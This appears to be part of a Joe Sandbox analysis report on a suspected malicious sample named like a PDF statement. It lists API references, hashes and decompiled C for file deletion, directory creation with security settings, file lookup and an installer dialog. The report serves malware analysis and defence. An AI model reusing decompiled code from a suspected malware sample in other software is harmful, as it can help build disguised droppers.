0x6ed62b26
0x6ed62b28
0x6ed62b3f
0x6ed62b3f
0x6ed62b3f
0x6ed62b47
0x6ed62b4c
0x6ed62b54
0x6ed62b56
0x6ed62b5a
0x6ed62b5b
0x6ed62b5e
0x6ed62b60
0x6ed62b67
0x6ed62b6d
0x6ed62b6f
0x6ed62b71
0x6ed62b76
0x6ed62b88
0x6ed62b88
0x6ed62b76
0x6ed62b6f
0x6ed62b5e
0x6ed62b8e
0x6ed62b92
0x6ed62b9c
0x6ed62ba4
0x6ed62bb1
0x6ed62bb8
0x6ed62bba
0x6ed62bc4
0x6ed62bca
0x6ed62bca
0x00000000
0x00000000
0x6ed62bcc
0x6ed62bcc
0x6ed62bcc
0x6ed62bcc
0x00000000
0x6ed62bcc
0x6ed62bbc
0x6ed62bbc
0x00000000
0x6ed62b94
0x6ed62b94
0x6ed62b9a
0x00000000
0x00000000
0x00000000
0x6ed62b9a
0x6ed62b92
0x6ed62b2b
0x6ed62b31
0x6ed62b37
0x6ed62b39
0x00000000
0x00000000
0x00000000
0x6ed62b39
0x6ed62aff
0x6ed62b06
0x6ed62b0c
0x6ed62b12
0x00000000
0x6ed62b12
0x6ed62a73
0x6ed62a76
0x6ed62adc
0x6ed62adc
0x6ed62ae2
0x6ed62ae5
0x00000000
0x00000000
0x6ed62aeb
0x6ed62aec
0x00000000
0x6ed62af1
0x6ed62a7b
0x00000000
0x00000000
0x6ed62a81
0x6ed62a81
0x6ed62a84
0x6ed62a8a
0x6ed62a8c
0x6ed62a95
0x00000000
0x00000000
0x6ed62a9c
0x6ed62aa7
0x6ed62ab0
0x6ed62ab6
0x6ed62abc
0x6ed62ac2
0x6ed62ad5
0x00000000
0x6ed62ad5

APIs

Part of subcall function 6ED612F8: GlobalAlloc.KERNEL32(00000040,?,6ED611C4,-000000A0), ref: 6ED61302

GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 6ED6294E
lstrcpyW.KERNEL32(00000008,?), ref: 6ED629A4
lstrcpyW.KERNEL32(00000808,?), ref: 6ED629AF
GlobalFree.KERNEL32(00000000), ref: 6ED629C0
GlobalFree.KERNEL32(?), ref: 6ED62A44
GlobalFree.KERNELBASE(?), ref: 6ED62A4A
GlobalFree.KERNEL32(?), ref: 6ED62A50
GetModuleHandleW.KERNEL32(00000008), ref: 6ED62B1A
LoadLibraryW.KERNEL32(00000008), ref: 6ED62B2B
GetProcAddress.KERNEL32(?,?), ref: 6ED62B82
lstrlenW.KERNEL32(00000808), ref: 6ED62B9D

Memory Dump Source

Source File: 00000000.00000002.3063969058.000000006ED61000.00000020.00000001.01000000.00000004.sdmp, Offset: 6ED60000, based on PE: true

Associated: 00000000.00000002.3063862656.000000006ED60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3064061225.000000006ED64000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3064139209.000000006ED66000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ed60000_ekstre_pdf.jbxd

Similarity

API ID: Global$Free$Alloclstrcpy$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 1042148487-0
Opcode ID: 86db1c77ceb64d849d0d8f59a34db782aa17a1ee6fd0e48ffefe617628ef55bf
Instruction ID: 6993219bb805ad396c912155a1f51e5132311ff53d67fae49a4bb4d51480ffb0
Opcode Fuzzy Hash: 86db1c77ceb64d849d0d8f59a34db782aa17a1ee6fd0e48ffefe617628ef55bf
Instruction Fuzzy Hash: 6F42C171A48302DFD358CFA9C85476AB7E4FF89318F004A2EE4D9D7294E7B0D5858B92

Uniqueness

Uniqueness Score: -1.00%

Function 00405C49 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00405C49(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405F14(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x47af88 =  *0x47af88 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040653D(0x460270, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405E58(_t68);
					} else {
						lstrcatW(0x460270, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x460270,  &_v604);
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E0040653D(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405C01(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E0040559F(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x47af88 =  *0x47af88 + 1;
										} else {
											E0040559F(0xfffffff1, _t68);
											E004062FD(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405C49(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x460270 - 0x5c;
					if( *0x460270 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E00406873(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405E0C(_t68);
							_t38 = E00405C01(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E0040559F(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E0040559F(0xfffffff1, _t68);
							return E004062FD(_t67, _t68, 0);
						}
						L30:
						 *0x47af88 =  *0x47af88 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

0x00405c53
0x00405c58
0x00405c61
0x00405c64
0x00405c6c
0x00405c6f
0x00405c72
0x00405c7a
0x00405c7c
0x00405c7d
0x00000000
0x00405c7d
0x00405c88
0x00405c8b
0x00405c8b
0x00405c8b
0x00405c8f
0x00405ca2
0x00405ca9
0x00405cae
0x00405cb2
0x00405cc2
0x00405cb4
0x00405cba
0x00405cba
0x00405cc7
0x00405ccb
0x00405cd7
0x00405cdd
0x00405ce2
0x00405ce8
0x00405cf3
0x00405cf9
0x00405cfb
0x00405cfe
0x00405da8
0x00405da8
0x00405dac
0x00405dae
0x00405dae
0x00405dae
0x00405dae
0x00000000
0x00000000
0x00000000
0x00000000
0x00405d04
0x00405d04
0x00405d04
0x00405d0c
0x00405d2c
0x00405d34
0x00405d39
0x00405d40
0x00405d5b
0x00405d60
0x00405d62
0x00405d86
0x00405d64
0x00405d64
0x00405d67
0x00405d7b
0x00405d69
0x00405d6c
0x00405d74
0x00405d74
0x00405d67
0x00405d42
0x00405d48
0x00405d4a
0x00405d50
0x00405d50
0x00405d4a
0x00000000
0x00405d40
0x00405d0e
0x00405d16
0x00000000
0x00000000
0x00405d18
0x00405d20
0x00000000
0x00000000
0x00405d22
0x00405d2a
0x00000000
0x00000000
0x00000000
0x00405d8b
0x00405d93
0x00405d99
0x00405d99
0x00405da2
0x00000000
0x00405da2
0x00405ccd
0x00405cd5
0x00000000
0x00000000
0x00000000
0x00405c91
0x00405c91
0x00405c93
0x00405db3
0x00405db5
0x00405db8
0x00405e09
0x00405e09
0x00405e09
0x00405dba
0x00405dbd
0x00405dc8
0x00405dcd
0x00405dcf
0x00000000
0x00000000
0x00405dd2
0x00405dde
0x00405de3
0x00405de5
0x00000000
0x00405e00
0x00405de7
0x00405dea
0x00000000
0x00000000
0x00405def
0x00000000
0x00405df6
0x00405dbf
0x00405dbf
0x00000000
0x00405dbf
0x00405c99
0x00405c9c
0x00000000
0x00000000
0x00000000
0x00405c9c

APIs

DeleteFileW.KERNELBASE(?,?,759D3420,004E0000,00000000), ref: 00405C72
lstrcatW.KERNEL32(00460270,\*.*), ref: 00405CBA
lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
lstrlenW.KERNEL32(?,?,0040A014,?,00460270,?,?,759D3420,004E0000,00000000), ref: 00405CE3
FindFirstFileW.KERNEL32(00460270,?,?,?,0040A014,?,00460270,?,?,759D3420,004E0000,00000000), ref: 00405CF3
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
FindClose.KERNEL32(00000000), ref: 00405DA2

Strings

., xrefs: 00405D18
., xrefs: 00405D04
\*.*, xrefs: 00405CB4

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: .$.$\*.*
API String ID: 2035342205-3749113046
Opcode ID: 6f99b477790fb53b6eecf85cfa43b1ff36658bcd329ff4c857389babed84468a
Instruction ID: 6c00dbe643a860ecc9bf15fd1ad1233b3cc0783edab2dc124e8dce3c6147f04d
Opcode Fuzzy Hash: 6f99b477790fb53b6eecf85cfa43b1ff36658bcd329ff4c857389babed84468a
Instruction Fuzzy Hash: C741AF30800A14BADB216B65CC8DABF7678EF81758F14813FF845B21D1D77C4A819EAE

Uniqueness

Uniqueness Score: -1.00%

Function 00405A6E Relevance: 6.0, APIs: 4, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405A6E(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x00405a79
0x00405a7d
0x00405a80
0x00405a86
0x00405a8a
0x00405a8e
0x00405a96
0x00405a9d
0x00405aa3
0x00405aaa
0x00405ab1
0x00405ab9
0x00405abb
0x00000000
0x00405abb
0x00405ac5
0x00405acc
0x00405ae2
0x00000000
0x00000000
0x00000000
0x00405ae4
0x00405ae8

APIs

CreateDirectoryW.KERNELBASE(?,?,004E0000), ref: 00405AB1
GetLastError.KERNEL32 ref: 00405AC5
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
GetLastError.KERNEL32 ref: 00405AE4

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID:
API String ID: 3449924974-0
Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9

Uniqueness

Uniqueness Score: -1.00%

Function 00406873 Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406873(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x4682b8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4682b8;
			}

0x0040687e
0x00406887
0x00000000
0x00406894
0x0040688a
0x00000000

APIs

FindFirstFileW.KERNELBASE(759D3420,004682B8,00464270,00405F5D,00464270,00464270,00000000,00464270,00464270,759D3420,?,004E0000,00405C69,?,759D3420,004E0000), ref: 0040687E
FindClose.KERNEL32(00000000), ref: 0040688A

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 4734d1aeb850aaddc09d8666a85e7b820d11d597e95b4d689eee2a0b231bcb63
Instruction ID: 722420b177453bd5d714b4fbcb3f219e625ff7d95bf305fef0b1a87f3ecb0334
Opcode Fuzzy Hash: 4734d1aeb850aaddc09d8666a85e7b820d11d597e95b4d689eee2a0b231bcb63
Instruction Fuzzy Hash: D8D013315551105FC34017346E0C44777945F55335315C776B499F51E0D7348C7346BD

Uniqueness

Uniqueness Score: -1.00%

Function 00403F9A Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00403F9A(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x450250 = _t34;
					if(_t130 == 0x110) {
						 *0x47af08 = _t127;
						 *0x450264 = GetDlgItem(_t127, "true");
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x440230 = _t91;
						E00404499(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x472ee8);
						 *0x472ecc = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x450250 = 1;
					}
					_t124 =  *0x40a368; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x47af20;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E004044E5(0x40b);
						while(1) {
							_t36 =  *0x450250;
							 *0x40a368 =  *0x40a368 + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a368; // 0x0
							__eflags = _t38 -  *0x47af24;
							if(_t38 ==  *0x47af24) {
								E0040140B("true");
							}
							__eflags =  *0x472ecc - _t136;
							if( *0x472ecc != _t136) {
								break;
							}
							__eflags =  *0x40a368 -  *0x47af24; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E0040657A(_t117, _t127, _t133, 0x4f4000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E00404499(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E00404499(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E00404499(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x47af8c - _t136;
							_v28 = _t48;
							if( *0x47af8c != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008); // executed
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
							E004044BB(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x440230, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push("true");
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, "true");
							__eflags =  *0x47af8c - _t136;
							if( *0x47af8c == _t136) {
								_push( *0x450264);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x440230);
							}
							E004044CE();
							E0040653D(0x450268, E00403F7B());
							E0040657A(0x450268, _t127, _t133,  &(0x450268[lstrlenW(0x450268)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x450268); // executed
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x472ed8); // executed
									 *0x448240 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x47af00,  *_t133 +  *0x472ee0 & 0x0000ffff, _t127,  *( *(_t133 + 4) * 4 + "XF@"), _t133); // executed
									__eflags = _t73 - _t136;
									 *0x472ed8 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E00404499(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x472ed8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x472ecc - _t136;
									if( *0x472ecc != _t136) {
										goto L63;
									}
									ShowWindow( *0x472ed8, 8); // executed
									E004044E5(0x405);
									goto L60;
								}
								__eflags =  *0x47af8c - _t136;
								if( *0x47af8c != _t136) {
									goto L63;
								}
								__eflags =  *0x47af80 - _t136;
								if( *0x47af80 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x472ed8);
						 *0x47af08 = _t136;
						EndDialog(_t127,  *0x444238);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x472ed8, 0x40f, 0, "true");
						__eflags =  *0x472ecc;
						return 0 |  *0x472ecc == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x450248, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x472ed8, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x47af8c - _t136;
											if( *0x47af8c == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x444238 = 1;
												L23:
												_push(0x78);
												L24:
												E00404472();
												goto L28;
											}
											E0040140B(_t129);
											 *0x444238 = _t129;
											goto L23;
										}
										__eflags =  *0x40a368 - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x472ed8);
						 *0x472ed8 = _t122;
						L60:
						if( *0x460268 == _t136 &&  *0x472ed8 != _t136) {
							ShowWindow(_t127, 0xa); // executed
							 *0x460268 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x450248,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E00404500(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}

0x00403fa5
0x00403fac
0x00404113
0x00404117
0x0040411b
0x0040411d
0x00404122
0x0040412d
0x00404138
0x0040413d
0x0040413f
0x00404141
0x00404144
0x00404149
0x00404157
0x00404164
0x0040416b
0x0040416b
0x0040416c
0x0040416c
0x00404171
0x00404177
0x0040417e
0x00404184
0x00404186
0x004041c6
0x004041cb
0x004041d0
0x004041d0
0x004041d5
0x004041de
0x004041e0
0x004041e5
0x004041eb
0x004041ef
0x004041ef
0x004041f4
0x004041fa
0x00000000
0x00000000
0x00404205
0x0040420b
0x00000000
0x00000000
0x00404214
0x0040421c
0x00404221
0x00404224
0x0040422a
0x0040422f
0x00404232
0x00404238
0x0040423d
0x00404240
0x00404246
0x0040424e
0x00404254
0x0040425a
0x0040425e
0x00404265
0x00404265
0x00404265
0x0040426f
0x00404281
0x0040428d
0x00404292
0x0040429c
0x004042a2
0x004042a4
0x004042a9
0x004042a6
0x004042a6
0x004042a6
0x004042b9
0x004042d1
0x004042d3
0x004042d9
0x004042ee
0x004042db
0x004042e4
0x004042e6
0x004042e6
0x004042f4
0x00404305
0x0040431b
0x00404322
0x00404328
0x0040432c
0x00404331
0x00404333
0x00000000
0x00404339
0x00404339
0x0040433b
0x00000000
0x00000000
0x00404341
0x00404345
0x0040436a
0x00404370
0x00404376
0x00404378
0x00000000
0x00000000
0x0040439e
0x004043a4
0x004043a6
0x004043ab
0x00000000
0x00000000
0x004043b1
0x004043b4
0x004043b7
0x004043ce
0x004043da
0x004043f3
0x004043f9
0x004043fd
0x00404402
0x00404408
0x00000000
0x00000000
0x00404412
0x0040441d
0x00000000
0x0040441d
0x00404347
0x0040434d
0x00000000
0x00000000
0x00404353
0x00404359
0x00000000
0x00000000
0x00000000
0x0040435f
0x00404333
0x0040442a
0x00404436
0x0040443d
0x00000000
0x00404188
0x00404188
0x0040418b
0x004041be
0x004041be
0x004041c0
0x00000000
0x00000000
0x00000000
0x004041c0
0x0040418d
0x00404191
0x00404196
0x00404198
0x00000000
0x00000000
0x004041a8
0x004041b0
0x00000000
0x004041b6
0x00403fbe
0x00403fbe
0x00403fc2
0x00403fc7
0x00403fd6
0x00403fd6
0x00403fdc
0x00403fe3
0x00404027
0x0040402d
0x00404046
0x00404049
0x0040405c
0x00404062
0x00000000
0x00000000
0x00404068
0x00404073
0x00404075
0x00404077
0x00404096
0x00404096
0x00404099
0x0040409e
0x004040a1
0x004040b1
0x004040b2
0x004040b4
0x004040ea
0x004040fa
0x00000000
0x004040fa
0x004040b6
0x004040bc
0x004040d5
0x004040da
0x004040dc
0x00000000
0x00000000
0x004040de
0x004040ca
0x004040ca
0x004040cc
0x004040cc
0x00000000
0x004040cc
0x004040bf
0x004040c4
0x00000000
0x004040c4
0x004040a3
0x004040a9
0x00000000
0x00000000
0x004040ab
0x00000000
0x004040ab
0x0040409b
0x00000000
0x0040409b
0x00404081
0x00404088
0x0040408e
0x00404090
0x00404466
0x00000000
0x00404466
0x00000000
0x00404090
0x0040404e
0x00000000
0x00404056
0x00404035
0x0040403b
0x00404443
